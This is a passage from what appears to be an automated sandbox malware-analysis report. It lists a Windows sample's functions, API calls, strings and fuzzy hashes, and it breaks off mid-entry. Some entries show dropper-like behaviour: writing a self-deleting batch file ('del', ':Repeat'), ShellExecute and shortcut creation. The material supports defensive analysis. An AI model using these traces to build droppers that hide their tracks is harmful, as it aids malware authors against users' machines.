                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                            • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                            • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                            • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                            Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                            • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                            • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                            • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                            Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                            • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                            • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                            • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                            Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                            • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                            • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                            • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                            Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                            • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                            • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                            • Instruction Fuzzy Hash:

                                                            Non-executed Functions

                                                            Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wtol.MSVCRT ref: 004034E5
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                            • _wtol.MSVCRT ref: 0040367F
                                                            • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                            • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                            • String ID: .lnk
                                                            • API String ID: 408529070-24824748
                                                            • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                            • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                            • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                            • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                            Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                            • wsprintfW.USER32 ref: 00401FFD
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                            • GetLastError.KERNEL32 ref: 00402017
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                            • GetLastError.KERNEL32 ref: 0040204C
                                                            • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                            • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                            • SetLastError.KERNEL32(00000000), ref: 00402098
                                                            • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                            • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                            • _wtol.MSVCRT ref: 0040212A
                                                            • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                            • String ID: 7zSfxString%d$XpA$\3A
                                                            • API String ID: 2117570002-3108448011
                                                            • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                            • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                            • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                            • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                            Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                            • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                            • LockResource.KERNEL32(00000000), ref: 00401C41
                                                            • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                            • wsprintfW.USER32 ref: 00401C95
                                                            • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                            • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                            • API String ID: 2639302590-365843014
                                                            • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                            • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                            • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                            • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                            Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                            • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                            • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                            • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                            • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                            • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                            • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                            • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                            • String ID:
                                                            • API String ID: 829399097-0
                                                            • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                            • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                            • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                            • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                            Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                            • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                            • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                            • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                            • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                            • String ID:
                                                            • API String ID: 1862581289-0
                                                            • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                            • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                            • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                            • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                            Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                            • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                            • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: Window$AddressLibraryLoadProc
                                                            • String ID: SetWindowTheme$\EA$uxtheme
                                                            • API String ID: 324724604-1613512829
                                                            • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                            • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                            • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                            • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                            Function 0041022D Relevance: .5, Instructions: 501COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                            • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                            • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                            • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                            Function 0041206B Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                            • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                            • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                            • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                            Function 00411F91 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                            • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                            • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                            • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                            Function 0040D72E Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                            • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                            • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                            • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                            Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                            • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                            • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                            • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                            • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                            • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
